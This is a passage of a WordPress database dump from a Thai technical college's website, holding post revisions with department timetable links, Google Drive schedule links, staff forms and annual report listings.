'http://www.technicrayong.ac.th/2189-revision-v1/', 0, 'revision', '', 0),
(2335, 4, '2018-05-06 23:15:13', '2018-05-06 16:15:13', '<pre><strong><span style=\"color: #ff0000;\">ประเภทวิชาอุตสาหกรรม</span></strong></pre>\r\n<p style=\"padding-left: 30px;\"><span style=\"color: #000080;\"><a style=\"color: #000080;\" href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B8%AA%E0%B8%AD%E0%B8%99%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%A2%E0%B8%99%E0%B8%95%E0%B9%8C-%E0%B9%80%E0%B8%97%E0%B8%84%E0%B8%99%E0%B8%B4%E0%B8%84/\">แผนกวิชาช่างยนต์/เทคนิคเครื่องกล</a></span></p>\r\n<p style=\"padding-left: 30px;\"><span style=\"color: #000080;\"><a style=\"color: #000080;\" href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%81%E0%B8%A5%E0%B9%82%E0%B8%A3%E0%B8%87/\">แผนกวิชาช่างกลโรงงาน/เทคนิคการผลิต</a></span></p>\r\n<p style=\"padding-left: 30px;\"><span style=\"color: #000080;\"><a style=\"color: #000080;\" href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B9%80%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD/\">แผนกวิชาช่างเชื่อมโลหะ/เทคนิคโลหะ</a></span></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B9%84%E0%B8%9F%E0%B8%9F%E0%B9%89%E0%B8%B2/\">แผนกวิชาช่างไฟฟ้ากำลัง</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%AD%E0%B8%B4%E0%B9%80%E0%B8%A5%E0%B9%87/\">แผนกวิชาช่างอิเล็กทรอนิกส์</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%81%E0%B9%88%E0%B8%AD%E0%B8%AA%E0%B8%A3/\">แผนกวิชาช่างก่อสร้าง</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B9%80%E0%B8%84%E0%B8%A3%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%87%E0%B8%A1%E0%B8%B7/\">แผนกวิชาเครื่องมือวัดและควบคุม</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%9B%E0%B8%B4%E0%B9%82%E0%B8%95%E0%B8%A3%E0%B9%80%E0%B8%84%E0%B8%A1%E0%B8%B5/\">แผนกวิชาปิโตรเคมี</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B9%80%E0%B8%84%E0%B8%A1%E0%B8%B5%E0%B8%AD%E0%B8%B8%E0%B8%95%E0%B8%AA%E0%B8%B2/\">แผนกวิชาเคมีอุตสาหกรรม</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B9%80%E0%B8%97%E0%B8%84%E0%B9%82%E0%B8%99%E0%B9%82%E0%B8%A5%E0%B8%A2%E0%B8%B5%E0%B8%A2%E0%B8%B2%E0%B8%87/\">แผนกวิชาเทคโนโลยียาง</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B9%80%E0%B8%97%E0%B8%84%E0%B8%99%E0%B8%B4%E0%B8%84%E0%B8%9E%E0%B8%B7%E0%B9%89/\">แผนกวิชาเทคนิคพื้นฐาน</a></p>\r\n\r\n<pre><span style=\"color: #ff0000;\"><strong>ประเภทวิชาบริหารธุรกิจ</strong></span></pre>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%9A%E0%B8%B1%E0%B8%8D%E0%B8%8A%E0%B8%B5/\">แผนกวิชาการบัญชี</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%95%E0%B8%A5%E0%B8%B2%E0%B8%94-%E0%B8%81%E0%B8%B2/\">แผนกวิชาการตลาด/การจัดการธุรกิจค้าปลีก</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A5%E0%B8%82%E0%B8%B2%E0%B8%99%E0%B8%B8/\">แผนกวิชาการเลขานุการ/การจัดการสำนักงาน</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%84%E0%B8%AD%E0%B8%A1%E0%B8%9E%E0%B8%B4%E0%B8%A7%E0%B9%80%E0%B8%95%E0%B8%AD/\">แผนกวิชาคอมพิวเตอร์ธุรกิจ</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%81%E0%B8%B2%E0%B8%A3/\">แผนกวิชาการจัดการโลจิสติกส์</a></p>\r\n\r\n<pre><span style=\"color: #ff0000;\"><strong>ประเภทวิชาคหกรรม</strong></span></pre>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%84%E0%B8%AB%E0%B8%81%E0%B8%A3%E0%B8%A3%E0%B8%A1%E0%B8%A8%E0%B8%B2%E0%B8%AA/\">แผนกวิชาคหกรรมศาสตร์</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%AD%E0%B8%B2%E0%B8%AB%E0%B8%B2%E0%B8%A3%E0%B9%81%E0%B8%A5%E0%B8%B0%E0%B9%82/\">แผนกวิชาอาหารและโภชนาการ</a></p>\r\n\r\n<pre><span style=\"color: #ff0000;\"><strong>ประเภทวิชาอุตสาหกรรมท่องเที่ยว</strong></span></pre>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%97%E0%B9%88%E0%B8%AD%E0%B8%87%E0%B9%80%E0%B8%97/\">แผนกวิชาการท่องเที่ยว</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%82%E0%B8%A3%E0%B8%87%E0%B9%81%E0%B8%A3%E0%B8%A1/\">แผนกวิชาการโรงแรม</a></p>\r\n\r\n<pre><span style=\"color: #ff0000;\">ประเภทวิชาเทคโนโลยีสารสนเทศและการสื่อสาร</span></pre>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B8%AA%E0%B8%B2%E0%B8%82%E0%B8%B2%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B9%80%E0%B8%97%E0%B8%84%E0%B9%82%E0%B8%99%E0%B9%82%E0%B8%A5%E0%B8%A2%E0%B8%B5/\">สาขาวิชาเทคโนโลยีสารสนเทศ</a></p>\r\n\r\n<pre><span style=\"color: #ff0000;\"><strong>แผนกวิชาสามัญสัมพันธ์</strong></span></pre>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B8%AB%E0%B8%A1%E0%B8%A7%E0%B8%94%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%A7%E0%B8%B4%E0%B8%97%E0%B8%A2%E0%B8%B2%E0%B8%A8%E0%B8%B2%E0%B8%AA%E0%B8%95/\">หมวดวิชาวิทยาศาสตร์</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B8%AB%E0%B8%A1%E0%B8%A7%E0%B8%94%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%84%E0%B8%93%E0%B8%B4%E0%B8%95%E0%B8%A8%E0%B8%B2%E0%B8%AA%E0%B8%95%E0%B8%A3/\">หมวดวิชาคณิตศาสตร์</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B8%AB%E0%B8%A1%E0%B8%A7%E0%B8%94%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%A0%E0%B8%B2%E0%B8%A9%E0%B8%B2%E0%B8%95%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%9B/\">หมวดวิชาภาษาต่างประเทศ</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B8%AB%E0%B8%A1%E0%B8%A7%E0%B8%94%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%AA%E0%B8%B1%E0%B8%87%E0%B8%84%E0%B8%A1%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9/\">หมวดวิชาสังคมศึกษา</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B8%AB%E0%B8%A1%E0%B8%A7%E0%B8%94%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%A0%E0%B8%B2%E0%B8%A9%E0%B8%B2%E0%B9%84%E0%B8%97%E0%B8%A2/\">หมวดวิชาภาษาไทย</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B8%AB%E0%B8%A1%E0%B8%A7%E0%B8%94%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%9E%E0%B8%A5%E0%B8%B2%E0%B8%99%E0%B8%B2%E0%B8%A1%E0%B8%B1%E0%B8%A2/\">หมวดวิชาพลานามัย</a></p>', 'ตารางเรียน-ตารางสอน', '', 'inherit', 'closed', 'closed', '', '1174-revision-v1', '', '', '2018-05-06 23:15:13', '2018-05-06 16:15:13', '', 1174, 'http://www.technicrayong.ac.th/1174-revision-v1/', 0, 'revision', '', 0),
(2337, 4, '2018-05-06 23:18:28', '2018-05-06 16:18:28', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=1I8IzCaFRbKs9qyITbQ1v29Qkafdtoyqr\"><span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=19k1qJIBg00k5cI_rNSqI0w3BawkUjwEC\"><span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาช่างกลโรงงาน/เทคนิคการผลิต', '', 'inherit', 'closed', 'closed', '', '2215-revision-v1', '', '', '2018-05-06 23:18:28', '2018-05-06 16:18:28', '', 2215, 'http://www.technicrayong.ac.th/2215-revision-v1/', 0, 'revision', '', 0),
(2339, 4, '2018-05-06 23:20:21', '2018-05-06 16:20:21', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=1T0pHa-7DaD8MgGMHkrCXBccgesDQ9lSQ\"><span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=1eddod67RH3QhKVcoO-Fv9rs0SbahG95M\"><span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาช่างเชื่อมโลหะ/เทคนิคโลหะ', '', 'inherit', 'closed', 'closed', '', '2222-revision-v1', '', '', '2018-05-06 23:20:21', '2018-05-06 16:20:21', '', 2222, 'http://www.technicrayong.ac.th/2222-revision-v1/', 0, 'revision', '', 0),
(2342, 4, '2018-05-06 23:21:45', '2018-05-06 16:21:45', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=1V96vddqurFN3N4Hx3Lv0hWqud_sYGPZN\"><span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=1a_qPLEM63DK9oBLItdVKBKMMai_TWA__\"><span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาช่างไฟฟ้ากำลัง', '', 'inherit', 'closed', 'closed', '', '2227-revision-v1', '', '', '2018-05-06 23:21:45', '2018-05-06 16:21:45', '', 2227, 'http://www.technicrayong.ac.th/2227-revision-v1/', 0, 'revision', '', 0),
(2343, 4, '2018-05-06 23:22:03', '2018-05-06 16:22:03', '<pre>ตารางสอนครู</pre>\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\n\n<a href=\"https://drive.google.com/open?id=1V96vddqurFN3N4Hx3Lv0hWqud_sYGPZN\"><span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span></a>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\n<pre>ตารางเรียน</pre>\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\n\n<a href=\"https://drive.google.com/open?id=1a_qPLEM63DK9oBLItdVKBKMMai_TWA__\"><span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span></a>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาช่างไฟฟ้ากำลัง', '', 'inherit', 'closed', 'closed', '', '2227-autosave-v1', '', '', '2018-05-06 23:22:03', '2018-05-06 16:22:03', '', 2227, 'http://www.technicrayong.ac.th/2227-autosave-v1/', 0, 'revision', '', 0),
(2345, 4, '2018-05-06 23:23:49', '2018-05-06 16:23:49', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=1uiLC_aSepecWUM24PBRbwU1Tp_cQ6VSS\"><span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=17bRalt-R4DwZhWe128GBHupz7KvZnCaZ\"><span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาช่างอิเล็กทรอนิกส์', '', 'inherit', 'closed', 'closed', '', '2231-revision-v1', '', '', '2018-05-06 23:23:49', '2018-05-06 16:23:49', '', 2231, 'http://www.technicrayong.ac.th/2231-revision-v1/', 0, 'revision', '', 0),
(2349, 4, '2018-05-07 06:32:48', '2018-05-06 23:32:48', '<h2><span style=\"color: #333399;\">เอกสารเผยแพร่</span></h2>\r\n\r\n<hr />\r\n\r\n<pre style=\"padding-left: 30px;\"><span style=\"color: #ff0000;\"><a style=\"color: #ff0000;\" href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B8%AA%E0%B8%AD%E0%B8%99%E0%B8%84%E0%B8%A3%E0%B8%B9/\">ตารางเรียน-ตารางสอน</a></span></pre>\r\n\r\n<hr />\r\n\r\n<pre style=\"padding-left: 30px;\"><a href=\"http://www.technicrayong.ac.th/%E0%B9%80%E0%B8%AD%E0%B8%81%E0%B8%AA%E0%B8%B2%E0%B8%A3%E0%B8%9E%E0%B8%B1%E0%B8%92%E0%B8%99%E0%B8%B2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3/\"><span style=\"color: #ff0000;\">คู่มือพัฒนาการเรียนการสอน</span></a></pre>\r\n\r\n<hr />\r\n\r\n<pre style=\"padding-left: 30px;\"><span style=\"color: #ff0000;\"><a style=\"color: #ff0000;\" href=\"https://wp.me/P9wTWB-gF\">แบบฟอร์มสำหรับครูผู้สอน</a></span></pre>\r\n\r\n<hr />\r\n\r\n<pre style=\"padding-left: 30px;\"><span style=\"color: #ff0000;\"><a style=\"color: #ff0000;\" href=\"https://wp.me/P9wTWB-jb\">แบบฟอร์มสำหรับนักเรียนนักศึกษา</a></span></pre>\r\n ', 'งานพัฒนาหลักสูตรและการเรียนการสอน', '', 'inherit', 'closed', 'closed', '', '1000-revision-v1', '', '', '2018-05-07 06:32:48', '2018-05-06 23:32:48', '', 1000, 'http://www.technicrayong.ac.th/1000-revision-v1/', 0, 'revision', '', 0),
(2353, 3, '2018-05-07 09:30:39', '2018-05-07 02:30:39', '', 'ประก่าศ การลงทะเบียนเรียนประจำภาคเรียนที่ 1-2561', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b9%88%e0%b8%b2%e0%b8%a8-%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%a5%e0%b8%87%e0%b8%97%e0%b8%b0%e0%b9%80%e0%b8%9a%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b9%80%e0%b8%a3%e0%b8%b5', '', '', '2018-05-07 09:30:39', '2018-05-07 02:30:39', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/ประก่าศ-การลงทะเบียนเรียนประจำภาคเรียนที่-1-2561.pdf', 0, 'attachment', 'application/pdf', 0),
(2355, 3, '2018-05-07 13:15:35', '2018-05-07 06:15:35', '', 'แบบฟอร์ม ขออนุญาตไปราชการวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9a%e0%b8%9a%e0%b8%9f%e0%b8%ad%e0%b8%a3%e0%b9%8c%e0%b8%a1-%e0%b8%82%e0%b8%ad%e0%b8%ad%e0%b8%99%e0%b8%b8%e0%b8%8d%e0%b8%b2%e0%b8%95%e0%b9%84%e0%b8%9b%e0%b8%a3%e0%b8%b2%e0%b8%8a%e0%b8%81', '', '', '2018-05-07 13:15:35', '2018-05-07 06:15:35', '', 1516, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/แบบฟอร์ม-ขออนุญาตไปราชการวิทยาลัย.pdf', 0, 'attachment', 'application/pdf', 0),
(2356, 3, '2018-05-07 13:16:05', '2018-05-07 06:16:05', '<img class=\"aligncenter size-full wp-image-1469\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-25-12.jpg\" alt=\"\" width=\"195\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1467 \" src=\"/wp-content/uploads/2018/03/5-3-2561-11-04-59.jpg\" alt=\"\" width=\"365\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-1597 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-01-48.jpg\" alt=\"\" width=\"731\" height=\"315\" />\r\n<h3><span style=\"color: #0000ff;\">**</span><span style=\"color: #0000ff;\">ข้อมูลบุคลากร ปี 2560 <a href=\"/%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B8%9A%E0%B8%B8%E0%B8%84%E0%B8%A5%E0%B8%B2%E0%B8%81%E0%B8%A360/\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></a></span></h3>\r\n<h3><span style=\"color: #339966;\">**คำสั่งวิทยาลัยเทคนิคระยอง ที่ ๒๔๖๘ / ๒๕๖๐ เรื่อง แต่งตั้งข้าราชการครู ลูกจ้างประจำ พนักงานราชการ </span><span style=\"color: #339966;\">และลูกจ้างชั่วคราว ให้ทำหน้าที่ และปฏิบัติหน้าที่รับผิดชอบ <a href=\"/คำสั่งแต่งตั้ง-2468-2560\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></a></span></h3>\r\n<h3><span style=\"color: #800080;\"><strong>**หลักเกณฑ์และวิธีปฏิบัติในการจัดข้าราชการเข้าพักอาศัยในที่พักของทางราชการ </strong></span><span style=\"color: #339966;\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></span></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/05/แบบฟอร์ม-ขออนุญาตไปราชการวิทยาลัย.pdf\">**แบบฟอร์มขออนุญาตไปราชการวิทยาลัย</a></h3>\r\n \r\n\r\n ', 'งานบุคลากร', '', 'inherit', 'closed', 'closed', '', '1516-revision-v1', '', '', '2018-05-07 13:16:05', '2018-05-07 06:16:05', '', 1516, 'http://www.technicrayong.ac.th/1516-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2357, 3, '2018-05-08 10:21:16', '2018-05-08 03:21:16', '<h4><a href=\"/รายงานผล2560\"><span style=\"color: #ff00ff;\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2560<--</span></a></h4>\n<h4> <span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/รายงานผล2559\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2559<--</a></span></h4>\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/รายงานผล2558\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2558<--</a></span></h4>\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/รายงานผล2557\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2557<--</a></span></h4>\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ-2556.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2556<--</a></span></h4>\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/รายงานผลปี-2555.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2555<--</a></span></h4>\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/รายงานผล-การปฏิบัติงาน-และการใช้จ่ายเงินงบประมาณ-2554.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2554<--</a></span></h4>\n<h4><span style=\"color: #ff00ff;\">--><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/รายงานผล-การปฏิบัติงาน-และการใช้จ่ายเงินงบประมาณ-2553.pdf\">รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2553<--</a></span></h4>\n ', 'รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ', '', 'inherit', 'closed', 'closed', '', '1706-autosave-v1', '', '', '2018-05-08 10:21:16', '2018-05-08 03:21:16', '', 1706, 'http://www.technicrayong.ac.th/1706-autosave-v1/', 0, 'revision', '', 0),
